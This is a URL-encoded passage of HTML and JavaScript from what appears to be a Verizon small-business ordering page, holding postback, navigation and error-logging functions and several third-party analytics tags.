%2F%2F%09%09%09++++var+tempHTML+%3D+document.getElementById%28Ctrl1%29.innerHTML%3B%0D%0A%2F%2F%09%09++++++++document.getElementById%28Ctrl1%29.innerHTML+%3D+document.getElementById%28Ctrl2%29.innerHTML%3B%0D%0A%2F%2F%09%09++++++++document.getElementById%28Ctrl2%29.innerHTML+%3D+tempHTML%3B%0D%0A%2F%2F%09%09++++%7D%0D%0A%09%09+%7D+++%0D%0A%09%09+%2F%2FChanges+made+for+Project+North+-+close+brace+added++++++%0D%0A%09%09%7D%0D%0A++++%3C%2Fscript%3E%0D%0A%3C%2Fhead%3E%0D%0A%3Cbody+class%3D%22order%22+onload%3D%22BeginPageLoad%28%27test1%27%2C%27MyDiv%27%29%3Brotatemsg%28%29%3B%22%3E%0D%0A++%3Cform+name%3D%22Form1%22+method%3D%22post%22+action%3D%22RegistrationBridge.aspx%22+id%3D%22Form1%22+style%3D%22text-align%3Acenter%22%3E%0D%0A%3Cdiv%3E%0D%0A%3Cinput+name%3D%22__EVENTTARGET%22+id%3D%22__EVENTTARGET%22+value%3D%22%22+type%3D%22hidden%22%3E%0D%0A%3Cinput+name%3D%22__EVENTARGUMENT%22+id%3D%22__EVENTARGUMENT%22+value%3D%22%22+type%3D%22hidden%22%3E%0D%0A%3Cinput+name%3D%22__VIEWSTATE%22+id%3D%22__VIEWSTATE%22+value%3D%22%2FwEPDwUKLTE3NTcwNTc2MGRk%22+type%3D%22hidden%22%3E%0D%0A%3C%2Fdiv%3E%0D%0A%0D%0A%3Cscript+type%3D%22text%2Fjavascript%22%3E%0D%0A%2F%2F%3C%21%5BCDATA%5B%0D%0Avar+theForm+%3D+document.forms%5B%27Form1%27%5D%3B%0D%0Aif+%28%21theForm%29+%7B%0D%0A++++theForm+%3D+document.Form1%3B%0D%0A%7D%0D%0Afunction+__doPostBack%28eventTarget%2C+eventArgument%29+%7B%0D%0A++++if+%28%21theForm.onsubmit+%7C%7C+%28theForm.onsubmit%28%29+%21%3D+false%29%29+%7B%0D%0A++++++++theForm.__EVENTTARGET.value+%3D+eventTarget%3B%0D%0A++++++++theForm.__EVENTARGUMENT.value+%3D+eventArgument%3B%0D%0A++++++++theForm.submit%28%29%3B%0D%0A++++%7D%0D%0A%7D%0D%0A%2F%2F%5D%5D%3E%0D%0A%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A++%0D%0A%0D%0A%0D%0A%0D%0A%3Cscript+language%3D%22javascript%22+src%3D%22..%2FCommon%2Fincludes%2Fjs%2Fespanol.js%22%3E%3C%2Fscript%3E%0D%0A%0D%0A%3Cscript+language%3D%22javascript%22+src%3D%22..%2FCommon%2Fincludes%2Fjs%2FGlobalHeader.js%22%3E%3C%2Fscript%3E%0D%0A%0D%0A%3Cscript+language%3D%22javascript%22+src%3D%22..%2FCommon%2Fincludes%2Fjs%2Foo_engine.js%22%3E%3C%2Fscript%3E%0D%0A%0D%0A%3Cscript+language%3D%22javascript%22+type%3D%22text%2Fjavascript%22%3E%0D%0Avar+issaveorder+%3D+%27N%27%3B%0D%0Aif+%28%28typeof+MP+%21%3D+%27undefined%27%29+%26%26+%28MP+%21%3D+null%29+%26%26+%28MP.Domains+%21%3D+null%29%29%0D%0A%7B%0D%0A++++MP.Domains%5B%27es%27%5D%3D%27espanol.verizon.com%27%3B%0D%0A+%7D%0D%0A++%2F%2Fwindow.onerror+%3D+function%28errorMsg%2C+url%2C+lineNumber%29+%7Bif%28typeof+Log+%21%3D+%27undefined%27%29Log.Error%28errorMsg%2C+url%2C+lineNumber%29%3B+%7D%0D%0A+window.onerror+%3D+function%28errorMsg%2C+url%2C+lineNumber%29+%0D%0A+%7B%0D%0A+%2F%2Fdebugger%3B%0D%0A+++%2F%2F+alert%28dojoAjaxContent+%2B+%27+-+%27+%2B+url+%2B+%27+-+%27+%2B+lineNumber%29%3B+%0D%0A+++try%7B%0D%0A++++var+dojoAjaxContent+%3D+new+Object%28%29%0D%0A++++dojoAjaxContent%5B%22error%22%5D+%3D+errorMsg%3B%0D%0A++++dojoAjaxContent%5B%22url%22%5D+%3D+url%3B%0D%0A++++dojoAjaxContent%5B%22line%22%5D+%3D+lineNumber%3B%0D%0A++++dojo.xhrPost%28%7B%0D%0A%09%09++++url%3A+%27%2FForYourSmallBiz%2FGoFlow%2FCommon%2FJsError.aspx%27%2C%0D%0A%09%09++++content%3A+dojoAjaxContent%2C%0D%0A%09%09++++load%3A+function%28%29%7B%7D%2C%0D%0A++++++++++++error%3A+function%28err%29%7B%2F%2Falert%28%22ERROR%22%29%3B%0D%0A++++++++++++%7D%2C%0D%0A++++++++%09timeout%3A+80000%09%0D%0A%09++++%7D%29%3B%0D%0A%2F%2F%09++++try%0D%0A%2F%2F%09++++%7B%0D%0A%2F%2F%09++++++++if%28location.href.toUpperCase%28%29.indexOf%28%27VOICE%27%29%3E0%29%0D%0A%2F%2F%09++++++++%7B%0D%0A%2F%2F%09++++++++++++ShowTab%28document.getElementById%28%27lnkLines%27%29%2C+%27dvLines%27%29%3B%0D%0A%2F%2F%09++++++++%7D%0D%0A%2F%2F%09++++%7D%0D%0A%2F%2F%09++++catch%28e%29%0D%0A%2F%2F%09++++%7B%7D%0D%0A%09++++%0D%0A%09++++%7D%0D%0A%09++++%0D%0A%09++++catch%28e%29%0D%0A%09++++%7B%0D%0A%09++++++++%2F%2FDo+Nothing%0D%0A%09++++%7D++%0D%0A%09++++return+true%3B%0D%0A+%7D%0D%0A+%0D%0Afunction+getSelectedTab%28%29+%7B%0D%0A%0D%0A++++++++document.getElementById%28%22hdnClickYesNo%22%29.value%3D%22Y%22%3B%0D%0A++++++++var+tab%3D%27%27%3B%0D%0A++++++++var+sPath+%3D+window.location.pathname%3B%0D%0A++++++++var+sPage+%3D+sPath.substring%28sPath.lastIndexOf%28%27%2F%27%29+%2B+1%29%3B%0D%0A++++++++if%28sPage.toUpperCase%28%29%3D%3D%27VOICECONFIG.ASPX%27%29%0D%0A++++++++%7B%0D%0A++++++++++var+objControl+%3D+document.getElementById%28%27Header1_hdnSelectedVoiceTab%27%29%3B+%2F%2F%24%28%27input%5Btype%3Dhidden%5D%5Bid*%3DhdnSelectedVoiceTab%5D%27%29%3B++%0D%0A++++++++++if%28tabActive.id%21%3Dnull+%26%26+objControl%21%3Dnull%29%0D%0A++++++++++++objControl.value+%3D+tabActive.id%3B%0D%0A++++++++%7D%0D%0A++++%7D%0D%0A++++%0D%0A++++function+ValidateNavigationHeader%28vzLink%29+%7B%0D%0A++++++++document.getElementById%28%22hdnClickYesNo%22%29.value%3D%22Y%22%3B%0D%0A++++++++var+pmappid+%3D+document.getElementById%28%22curappid%22%29%3B%0D%0A++++++++window.document.forms%5B0%5D.method+%3D+%22post%22%3B%0D%0A++++++++if+%28pmappid+%21%3D+null+%26%26+pmappid.value+%3D%3D+%22AF%22%29+%7B%0D%0A++++++++++++window.document.forms%5B0%5D.action+%3D+%22..%2FMyVerizonNew%2FSaveOrder.aspx%3FClickNo%3DY%22%3B%0D%0A++++++++%7D%0D%0A++++++++else+%7B%0D%0A++++++++++++window.document.forms%5B0%5D.action+%3D+%22..%2FOrderNew%2FSaveOrder.aspx%3FClickNo%3DY%22%3B%0D%0A++++++++%7D%0D%0A++++++++window.document.forms%5B0%5D.submit%28%29%3B%0D%0A++++%7D%0D%0A++++%0D%0A++++function+NavigateHeader%28%29%0D%0A++++%7B++if%28issaveorder.toLowerCase%28%29+%3D%3D+%27false%27%29%0D%0A++++++++++++VZT.ModalHandler.show%28%7B+width%3A+500%2C+height%3A+400%2C+skin%3A+%27default%27%2C+content%3A+%27%23SaveMyOrderPopup%27+%7D%29%3B%0D%0A++++++++else+%0D%0A++++++++++++ValidateNavigation%28%27http%3A%2F%2Fsmallbusiness.verizon.com%27%29%3B%0D%0A++++%7D%0D%0A++++function+HideOverLay%28%29%0D%0A++++%7B%0D%0A++++++++try%0D%0A++++++++%7B%0D%0A++++++++++++VZT.ModalHandler.hide%28%29%3B%0D%0A++++++++%7D%0D%0A++++++++catch%28e%29%0D%0A++++++++%7B%0D%0A++++++++%7D%0D%0A++++%7D%0D%0A++++function+CheckforSaveOrder%28IsSavecart%29%0D%0A++++%7B%0D%0A++++++++var+tab%3D%27%27%3B%0D%0A++++++++var+sPath+%3D+window.location.pathname%3B%0D%0A++++++++var+sPage+%3D+sPath.substring%28sPath.lastIndexOf%28%27%2F%27%29+%2B+1%29%3B%0D%0A++++++++if%28sPage.toUpperCase%28%29%3D%3D%27VOICECONFIG.ASPX%27%29%0D%0A++++++++%7B%0D%0A++++++++++if%28tabActive.id%21%3Dnull%29%0D%0A++++++++++++tab%3D%27%3FTab%3D%27%2BtabActive.id%3B%0D%0A++++++++%7D%0D%0A++++++var+URL+%3D+%22SaveOrder.aspx%22%2Btab%3B%0D%0A++++++if%28window.location.href.indexOf%28%22MyVerizon%22%29%3E-1%29%0D%0A++++++++URL+%3D+%22..%2FMyVerizonNew%2F%22%2BURL%3B%0D%0A++++++else++++%0D%0A++++++++URL+%3D+%22..%2FOrderNew%2F%22%2BURL%3B%0D%0A++++++++%0D%0A++++++if%28IsSavecart%3D%3D%22Y%22%29%7B%0D%0A++++++++location.href%3DURL%3B+%7D%0D%0A++++++else%7B%0D%0A++++++++location.href%3D%22http%3A%2F%2Fsmallbusiness.verizon.com%22%3B%0D%0A++++++++%7D%0D%0A%7D%0D%0A%0D%0A%2F%2F+Added+to+check+the+availability+of+chat+icon+%28script+return+from+AIMS%29+-+For+Business+specialist+-+Sushanth%0D%0Afunction+AimsChatStatus%28obj%29+%7B%0D%0A++++%2F%2Fdebugger%3B%0D%0A++++if+%28obj+%3D%3D+%22NA%22%29+%7B%0D%0A++++++++if+%28document.getElementById%28%22divSpecialistHeader%22%29%29+%7B%0D%0A++++++++++++document.getElementById%28%22divSpecialistHeader%22%29.style.display+%3D+%22block%22%3B%0D%0A++++++++%7D%0D%0A++++%7D%0D%0A++++else+if+%28obj+%3D%3D+%22AA%22%29+%7B%0D%0A++++++++if+%28document.getElementById%28%22divSpecialistHeader%22%29%29+%7B%0D%0A++++++++++++document.getElementById%28%22divSpecialistHeader%22%29.style.display+%3D+%22none%22%3B%0D%0A++++++++%7D%0D%0A++++%7D%0D%0A%7D%0D%0A%0D%0A%2F%2F+Added+to+check+the+availability+of+chat+icon+%0D%0AsetTimeout%28%27displayBusinessSpecialist%28%29%27%2C+20000%29%3B%0D%0Afunction+displayBusinessSpecialist%28%29+%7B%0D%0A++++%2F%2Fdebugger%3B%0D%0A++++var+varSpanText+%3D+%22%22%3B%0D%0A++++if+%28document.getElementById%28%22aimsChatIcon1%22%29%29+%7B%0D%0A++++++++varSpanText+%3D+document.getElementById%28%22aimsChatIcon1%22%29.innerHTML%3B%0D%0A++++%7D%0D%0A++++else+if+%28document.getElementById%28%22aimsChatIcon%22%29%29+%7B%0D%0A++++++++varSpanText+%3D+document.getElementById%28%22aimsChatIcon%22%29.innerHTML%3B%0D%0A++++%7D%0D%0A++++var+varSpanIndex+%3D+varSpanText.indexOf%28%22aimsChatIconAvailable%22%29%3B%0D%0A++++if+%28varSpanIndex+%21%3D+-1%29+%7B%0D%0A++++++++if+%28document.getElementById%28%22divSpecialist%22%29+%21%3D+null%29%0D%0A++++++++document.getElementById%28%22divSpecialistHeader%22%29.style.display+%3D+%22none%22%3B%0D%0A++++%7D%0D%0A++++else+if+%28varSpanIndex+%3D%3D+-1%29+%7B%0D%0A++++++++if+%28document.getElementById%28%22divSpecialistHeader%22%29%29+%7B%0D%0A++++++++++++if+%28document.getElementById%28%22divSpecialist%22%29+%21%3D+null%29%0D%0A++++++++++++document.getElementById%28%22divSpecialistHeader%22%29.style.display+%3D+%22block%22%3B%0D%0A++++++++%7D%0D%0A++++%7D%0D%0A%7D%0D%0A%2F%2FAdded+OVER+-+Sushanth%0D%0A%0D%0A%3C%2Fscript%3E%0D%0A%0D%0A%3Cdiv+class%3D%22vzt%22+style%3D%22padding%3A+5px%3B%22%3E%0D%0A++++%3Cdiv+class%3D%22gb%22%3E%0D%0A++++++++%3Ca+href%3D%22%23%22+onclick%3D%22CheckforSaveOrder%28%27N%27%29%22+class%3D%22fl+logo%22%3E%0D%0A++++++++++++%0D%0A++++++++++++%3Cimg+src%3D%22..%2FCommon%2Fimages%2FOrderNew%2Flogo.gif%22+alt%3D%22Verizon%22%3E%3C%2Fa%3E%0D%0A++++++++%0D%0A++++++++%3Cinput+name%3D%22Header1%24hdnSelectedVoiceTab%22+id%3D%22Header1_hdnSelectedVoiceTab%22+type%3D%22hidden%22%3E%0D%0A++++++++%3Cinput+value%3D%22%22+id%3D%22curappid%22+name%3D%22curappid%22+type%3D%22hidden%22%3E%0D%0A++++++++%0D%0A++++++++%3Cdiv+class%3D%22clear%22%3E%0D%0A++++++++%3C%2Fdiv%3E%0D%0A++++%3C%2Fdiv%3E%0D%0A++++%3Cinput+id%3D%22hdnClickYesNo%22+name%3D%22hdnClickYesNo%22+value%3D%22N%22+type%3D%22hidden%22%3E%0D%0A++++%3Cinput+id%3D%22hdnSAVECARTSUCCESS%22+name%3D%22hdnSAVECARTSUCCESS%22+value%3D%22N%22+type%3D%22hidden%22%3E%0D%0A%3C%2Fdiv%3E%0D%0A++%0D%0A++%3Cdiv+class%3D%22fixer%22+style%3D%22height%3A50px%3B%22%3E%3C%2Fdiv%3E++++++%0D%0A++++%3Cdiv+id%3D%22MyDiv%22+name%3D%22MyDiv%22+class%3D%22vzt%22+align%3D%22center%22%3E%0D%0A++++++++%3Cdiv+id%3D%22test1%22+class%3D%22gb%22+style%3D%22margin-top%3A30px%3B%22%3E%0D%0A++++++++++++%3Cdiv+class%3D%22ds%22%3E%0D%0A+++++++++++++++++%3Cdiv+style%3D%22margin-left%3A10%3Bmargin-right%3A10%22%3E+++%0D%0A++++++++++++++++++++%3Cdiv+class%3D%22middle+png%22%3E%0D%0A++++++++++++++++++++++%3Cdiv+class%3D%22bg%22%3E%0D%0A++++++++++++++++++++++++++%3Cdiv+class%3D%22pad_wide%22+align%3D%22center%22%3E%0D%0A++++++++++++++++++++++++++++%3Cdiv+class%3D%22t_center%22+id%3D%22dvProgressBar%22%3E%0D%0A+++++++++++++++++++++++++++++++%3Ch3%3E%3Cdiv+id%3D%22alertmsg%22%3E%3C%2Fdiv%3E%3C%2Fh3%3E%0D%0A+++++++++++++++++++++++++++++++%3Cimg+class%3D%22centered%22+src%3D%22..%2FCommon%2Fimages%2FOrderNew%2Floading.gif%22+visible%3D%22true%22%3E%0D%0A++++++++++++++++++++++++++++++++%3Cdiv+class%3D%22fixer%22+style%3D%22height%3A15px%3B%22%3E%3C%2Fdiv%3E%0D%0A++++++++++++++++++++++++++++%3C%2Fdiv%3E%0D%0A++++++++++++++++++++++++++%3C%2Fdiv%3E%0D%0A++++++++++++++++++++++++%3C%2Fdiv%3E%0D%0A++++++++++++++++++++%3C%2Fdiv%3E+%0D%0A++++++++++++++++++++%3Cdiv+class%3D%22bottom+png%22%3E%0D%0A++++++++++++++++++++++%3Cdiv+class%3D%22png%22%3E%0D%0A++++++++++++++++++++++++++++%3Cdiv+class%3D%22png%22%3E%3C%2Fdiv%3E%0D%0A++++++++++++++++++++++%3C%2Fdiv%3E%0D%0A+++++++++++++%3C%2Fdiv%3E%0D%0A++++++++++++++++++%3C%2Fdiv%3E%0D%0A++++++++++++%3C%2Fdiv%3E%0D%0A++++++%3C%2Fdiv%3E+%0D%0A++++++++++++%0D%0A+++++%3C%2Fdiv%3E%0D%0A++++++++++%0D%0A+++++%3Cdiv+class%3D%22fixer%22+style%3D%22height%3A150px%3B%22%3E%3C%2Fdiv%3E%0D%0A+++++++++%0D%0A%3Cscript+language%3D%22javascript%22%3EvzLogging_appName%3D%22gbOrdering%22%3B%3C%2Fscript%3E%0D%0A%3Cscript+language%3D%22javascript%22+src%3D%22%2Fvztracker%2Fpagetrace%2Fpagetracker.js%22%3E%3C%2Fscript%3E%0D%0A%3Cscript+language%3D%22javascript%22+src%3D%22..%2FCommon%2Fincludes%2Fjs%2FBrowserClose.js%22%3E%3C%2Fscript%3E%3C%21--+Changes+made+for+Release+TN+Chagnes+--%3E%0D%0A%3Cscript+language%3D%22javascript%22+src%3D%22..%2FCommon%2Fincludes%2Fjs%2Foo_engine.js%22%3E%3C%2Fscript%3E%3C%21--included+for+site+feedback+link+error--%3E%0D%0A%0D%0A%3C%21--+BEGIN%3A+OnlineOpinion+v4.1+EVENT+SURVEy+--%3E%0D%0A%3C%21--+This+product+and+other+products+of+OpinionLab%2C+Inc.+are+protected+by+U.S.+Patent+No.+6606581%2C+6421724%2C+6785717+B1+and+other+patents+pending.+--%3E%0D%0A%09%3Cscript+src%3D%22..%2FCommon%2FIncludes%2Fjs%2FonlineopinionP41s%2Foo_engine.js%22+type%3D%22text%2Fjavascript%22%3E%3C%2Fscript%3E%0D%0A%09%3Cscript+src%3D%22..%2FCommon%2FIncludes%2Fjs%2FonlineopinionP41s%2Foo_conf_en-US_eventSX3.js%22+type%3D%22text%2Fjavascript%22%3E%3C%2Fscript%3E%0D%0A%3C%21--+END++%3A+OnlineOpinion+v4.0%2C+Copyright+2008-2009+Opinionlab%2C+Inc.+--%3E%0D%0A%0D%0A%3Cscript%3E%0D%0A%3C%2Fscript%3E%0D%0A%3C%21--+mp_trans_disable_start+--%3E%0D%0A%3Cscript+language%3D%22javascript1.1%22%3E%0D%0A++var+_hbEC%3D0%2C_hbE%3Dnew+Array%3Bfunction+_hbEvent%28a%2Cb%29%7Bb%3D_hbE%5B_hbEC%2B%2B%5D%3Dnew+Object%28%29%3Bb._N%3Da%3Bb._C%3D0%3Breturn+b%3B%7D%0D%0A++var+hbx%3D_hbEvent%28%22pv%22%29%3Bhbx.vpc%3D%22HBX0250u%22%3Bhbx.gn%3D%22ehg-verizon.hitbox.com%22%3B%0D%0A%0D%0A++%2F%2FBEGIN+EDITABLE+SECTION%0D%0A++%2F%2FCONFIGURATION+VARIABLES%0D%0A%0D%0A++var+varLoc%3Ddocument.location.hostname%3B%0D%0A++var+varURL+%3D+document.location.href%3B%0D%0A++if+%28+varLoc.indexOf%28%27www22%27%29+%3D%3D+0+%7C%7C+varLoc.indexOf%28%27espanol%27%29%3D%3D0+%29%0D%0A++%7B%0D%0A++++if%28varLoc.indexOf%28%27espanol%27%29%3D%3D0+%26%26+varURL.indexOf%28%22stage%22%29+%3E%3D0%29%0D%0A++%7B%0D%0A++hbx.acct%3D%22DM560412PISS%3BDM560507C0VN%22%3B%2F%2F+TEST+ACCTS%0D%0A%0D%0A++%7D%0D%0A++else%0D%0A++%7B%0D%0A++hbx.acct%3D%22DM550928B8DM%3BDM5605078BWM%22%3B%2F%2FPROD+ACCTS%0D%0A%0D%0A++%7D%0D%0A++%7D%0D%0A++else%0D%0A++%7B%0D%0A++hbx.acct%3D%22DM560412PISS%3BDM560507C0VN%22%3B%2F%2F+TEST+ACCTS%0D%0A++%7D%0D%0A%0D%0A++hbx.pn%3D%22verifyservices3%22%3B%2F%2FPAGE+NAME%28S%29%0D%0A++hbx.mlc%3D%22vz%2Fsmallbus%2Forder%2Fam+service+easy%2F%22%3B%2F%2FCONTENT+CATEGORY%0D%0A++++hbx.pndef%3D%22%22%3B%2F%2FDEFAULT+PAGE+NAME%0D%0A++++hbx.ctdef%3D%22full%22%3B%2F%2FDEFAULT+CONTENT+CATEGORY%0D%0A%0D%0A++++%2F%2FOPTIONAL+PAGE+VARIABLES%0D%0A++++%2F%2FACTION+SETTINGS%0D%0A++++hbx.lc%3D%22y%22%3B+%2F%2Fforce+lower+case+page+names%0D%0A++++hbx.fv%3D%22%22%3B%2F%2FFORM+VALIDATION+MINIMUM+ELEMENTS+OR+SUBMIT+FUNCTION+NAME%0D%0A++++hbx.lt%3D%22auto%22%3B%2F%2FLINK+TRACKING%0D%0A++++hbx.dlf%3D%22n%22%3B%2F%2FDOWNLOAD+FILTER%0D%0A++++hbx.dft%3D%22n%22%3B%2F%2FDOWNLOAD+FILE+NAMING%0D%0A++++hbx.elf%3D%22n%22%3B%2F%2FEXIT+LINK+FILTER%0D%0A%0D%0A++++%2F%2FSEGMENTS+AND+FUNNELS%0D%0A++++hbx.seg%3D%22%22%3B%2F%2FVISITOR+SEGMENTATION%0D%0A++++hbx.fnl%3D%22%22%3B%2F%2FFUNNELS%0D%0A%0D%0A++++%2F%2FCAMPAIGNS%0D%0A++++hbx.cmp%3D%22%22%3B%2F%2FCAMPAIGN+ID%0D%0A++++hbx.cmpn%3D%22%22%3B%2F%2FCAMPAIGN+ID+IN+QUERY%0D%0A++++hbx.dcmp%3D%22%22%3B%2F%2FDYNAMIC+CAMPAIGN+ID%0D%0A++++hbx.dcmpn%3D%22%22%3B%2F%2FDYNAMIC+CAMPAIGN+ID+IN+QUERY%0D%0A++++hbx.dcmpe%3D%22%22%3B%2F%2FDYNAMIC+CAMPAIGN+EXPIRATION%0D%0A++++hbx.dcmpre%3D%22%22%3B%2F%2FDYNAMIC+CAMPAIGN+RESPONSE+EXPIRATION%0D%0A++++hbx.hra%3D%22%22%3B%2F%2FRESPONSE+ATTRIBUTE%0D%0A++++hbx.hqsr%3D%22%22%3B%2F%2FRESPONSE+ATTRIBUTE+IN+REFERRAL+QUERY%0D%0A++++hbx.hqsp%3D%22%22%3B%2F%2FRESPONSE+ATTRIBUTE+IN+QUERY%0D%0A++++hbx.hlt%3D%22%22%3B%2F%2FLEAD+TRACKING%0D%0A++++hbx.hla%3D%22%22%3B%2F%2FLEAD+ATTRIBUTE%0D%0A++++hbx.gp%3D%22%22%3B%2F%2FCAMPAIGN+GOAL%0D%0A++++hbx.gpn%3D%22%22%3B%2F%2FCAMPAIGN+GOAL+IN+QUERY%0D%0A++++hbx.hcn%3D%22%22%3B%2F%2FCONVERSION+ATTRIBUTE%0D%0A++++hbx.hcv%3D%22%22%3B%2F%2FCONVERSION+VALUE%0D%0A++++hbx.cp%3D%22null%22%3B%2F%2FLEGACY+CAMPAIGN%0D%0A++++hbx.cpd%3D%22%22%3B%2F%2FCAMPAIGN+DOMAIN%0D%0A%0D%0A++++var+cv+%3D+_hbEvent%28%22cv%22%29%3B%0D%0A++++%2F%2FCUSTOM+VARIABLES%0D%0A++++hbx.ci%3D%22%22%3B%2F%2FCUSTOMER+ID%0D%0A++++hbx.hc1%3D%22%22%3B%2F%2FCUSTOM+1%0D%0A++++hbx.hc2%3D%22%22%3B%2F%2FCUSTOM+2%0D%0A++++hbx.hc3%3D%22%22%3B%2F%2FCUSTOM+3%0D%0A++++hbx.hc4%3D%22%22%3B%2F%2FCUSTOM+4%0D%0A++++if+%28varLoc.indexOf%28%27espanol%27%29%3D%3D0+%29%0D%0A++++++hbx.hc4%3D%22spanish%22%3B%0D%0A++++else%0D%0A++++++hbx.hc4%3D%22%22%3B%0D%0A++++hbx.hrf%3D%22%22%3B%2F%2FCUSTOM+REFERRER%0D%0A++++hbx.pec%3D%22%22%3B%2F%2FERROR+CODES%0D%0A%0D%0A++++%2F%2FINSERT+CUSTOM+EVENTS%0D%0A++++hbx.lvm%3D%22300%22%3B%0D%0A++++cv.c8+%3D+%22%22%3B%2F%2FSession+Id%0D%0A%09cv.c9+%3D+%22%22%3B%0D%0A++cv.c10+%3D+%22%22%3B%0D%0A++cv.c11+%3D+%22%22%3B+%2F%2F+Included+to+get+the+c11+Variable+for+the+NC+Scenarios+in+the+Order+Address+Info+Page+and+OOF+Page+and+LBO.%0D%0A++cv.c12+%3D+%22%22%3B+%2F%2F+Qualify+Attempt+Go+Flow+Session+ID+.+For+NC+Flow+--+OrderAddress+Info+Page+and+for+AMF+Registration+Bridge+Page+and+LBO+for+Common%0D%0A++cv.c14+%3D+%22%22%3B+%2F%2F+Session+ID+for+Review+Order+Page%0D%0A++%2F%2FEND+EDITABLE+SECTION%0D%0A%0D%0A++++%3C%2Fscript%3E%0D%0A%3Cscript+language%3D%22javascript1.1%22+src%3D%22%2FForYourSmallBiz%2FGoFlow%2Fcommon%2Fincludes%2Fjs%2Fhbx.js%22%3E%3C%2Fscript%3E%0D%0A%3C%21--+mp_trans_disable_end+--%3E%0D%0A%3C%21--+For+WR+75556+-+Site+Catalyst+--%3E%0D%0A%3Cscript+language%3D%22javascript%22%3E%0D%0A++var+varLoc+%3D+document.location.hostname%3B%0D%0A++var+varURL+%3D+document.location.href%3B%0D%0A%0D%0A++var+s_account+%3D+%27verizontelecomglobal%2Cverizontelecomsmb%27%3B%0D%0A%0D%0A%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A++++%3Cscript+language%3D%22javascript%22+src%3D%22https%3A%2F%2Fwww22.verizon.com%2Fincludes%2Fjavascript%2Fomnicode.js%22%3E%3C%2Fscript%3E%0D%0A++++%0D%0A++%3Cscript+language%3D%22javascript%22%3E%0D%0A++++if%28typeof+%28s_837%29+%21%3D+%22undefined%22%29%0D%0A++++%7B%0D%0A++++s_837.pfxID+%3D+%22smb%22%0D%0A++++s_837.pageLanguage%3D%22%22+%2F%2Foverride+en+for+language+by+populating+this+var+with+alternate+2+digit+language+code%0D%0A++++if%28varLoc.indexOf%28%27espanol%27%29+%3E+-1+%29+s_837.pageLanguage+%3D+%22es%22%0D%0A%0D%0A++++s_837.prop2%3D%22small+business%22%0D%0A++++s_837.prop3%3D%22order%22%0D%0A++++s_837.prop6%3D%22business%22%0D%0A%0D%0A++++s_837.simplepageName+%3D+%22%22%3B%0D%0As_837.detailpageName+%3D+%22%2FFORYOURSMALLBIZ%2FGoFlow%2FMyVerizonNew%2FRegistrationBridge.aspx%22%3B%0D%0As_837.prop4+%3D+%22%22%3B%0D%0As_837.prop5+%3D+%22smb+user%22%3B%0D%0As_837.prop10+%3D+%22%22%3B%0D%0As_837.prop22+%3D+%22%22%3B%0D%0As_837.prop48+%3D+%22EORDERING%22%3B%0D%0As_837.prop74+%3D+%22return%22%3B%0D%0As_837.prop75+%3D+%22%22%3B%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A++var+s_code%3Ds_837.t%28%29%3B%0D%0A++if%28s_code%29%0D%0A++++document.write%28s_code%29%3B%0D%0A%7D%0D%0A%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A%3C%21--+For+QH+61+--+ClearSaleing+Tags+--%3E%0D%0A%3Cscript+type%3D%22text%2Fjavascript%22%3E%0D%0A++var+csOrderNum+%3D+%27jfsi6022YD%27%3B%0D%0A++var+csOrderType+%3D+%27Loop+Qual+Attempt_General-SB%27%3B%0D%0A++var+csSalesStageCode+%3D+%27Closed%2FWon%27%3B%0D%0A%3C%2Fscript%3E%0D%0A%3Cscript+type%3D%22text%2Fjavascript%22%3E%0D%0A++csCookieDomain+%3D+%27verizon.com%27%3B%0D%0A%3C%2Fscript%3E%0D%0A%3Cscript+language%3D%22javascript%22+src%3D%22https%3A%2F%2Fdsa.csdata1.com%2Fdata%2Fjs%2F19000367%2Fcsgather.js%22%3E%3C%2Fscript%3E%0D%0A%09%3Cscript+language%3D%22javascript%22+type%3D%22text%2Fjavascript%22%3E%0D%0A%09%0D%0A++++%3C%2Fscript%3E%0D%0A++++++%0D%0A%3C%21--%3Cspan+id%3D%22footer%22%3E+--%3E%0D%0A%3Cdiv+class%3D%22vzt%22%3E%0D%0A+%3Cdiv+class%3D%22gb%22%3E%0D%0A%3Cdiv+id%3D%22footer%22+class%3D%22footer%22%3E%0D%0A%0D%0A%0D%0A++++++++++++++++%0D%0A++++++++++++++++%0D%0A++++++++++++++++%3Cdiv+class%3D%22fl%22%3E%0D%0A%09%09++++++++++++%0D%0A%09%09%09++++%0D%0A%09%09%09++++%3Cul%3E%0D%0A++++++++++++++++++++%3Cli%3E%3Ca+id%3D%22Footer1_Truste%22+style%3D%22float%3A+none%22+onclick%3D%22javascript%3Awindow.open%28%27http%3A%2F%2Fwww22.verizon.com%2Fprivacy%2F%27%29%3B+return+false%3B%22+href%3D%22javascript%3Avoid%280%29%3B%22+name%3D%22%26amp%3Blid%3Dfooter_trusteeimage%22%3E%0D%0A++++++++++++++++++++++++%3Cimg+alt%3D%22Reviewed+by+TRUSTe+site+privacy+statement%22+src%3D%22..%2FCommon%2FImages%2Ftruste_logo2.gif%22%3E%3C%2Fa%3E%3C%2Fli%3E%0D%0A++++++++++++++++++++%3Cli+class%3D%22last%22%3E%3Ca+style%3D%22float%3A+none%22+onclick%3D%22javascript%3Awindow.open%28%27http%3A%2F%2Fwww.bbbonline.org%2Fcks.asp%3Fid%3D108072593112%27%29%3B+return+false%3B%22+href%3D%22javascript%3Avoid%280%29%3B%22+name%3D%22%26amp%3Blid%3Dhp_res_footer_bbb_logo%22+target%3D%22_blank%22%3E%0D%0A++++++++++++++++++++++++%3Cimg+oncontextmenu%3D%22alert%28%27Use+without+permission+is+prohibited.+The+BBB+Accredited+Business+seal+is+a+trademark+of+the+Council+of+Better+Business+Bureaus%2C+Inc.%27%29%3B+return+false%3B%22+alt%3D%22Click+to+verify+BBB+accreditation+and+to+see+a+BBB+report.%22+src%3D%22..%2FCommon%2FImages%2Fbbb.jpg%22%3E%3C%2Fa%3E%3C%2Fli%3E%0D%0A++++++++++++++++%3C%2Ful%3E%0D%0A++++++++++++++++%3C%2Fdiv%3E%0D%0A++++++++++++++++%0D%0A%09++++++++++++%0D%0A%09++++++++++++%0D%0A%09++++++++++++%09%09%0D%0A%09++++++++++++%0D%0A%09++++++++++++%3Cdiv+class%3D%22fr%22%3E%0D%0A%09++++++++++++%3Cul%3E%0D%0A%09++++++++++++%3Cli%3E%0D%0A%09++++++++++++++++%3Ca+href%3D%22%23%22+onclick%3D%22javascript%3AO_LC%28%29%3Breturn+false%3B%22+name%3D%22%26amp%3Blid%3Dfooter_privacy%22+target%3D%22%23%22%3ESite+Feedback%3C%2Fa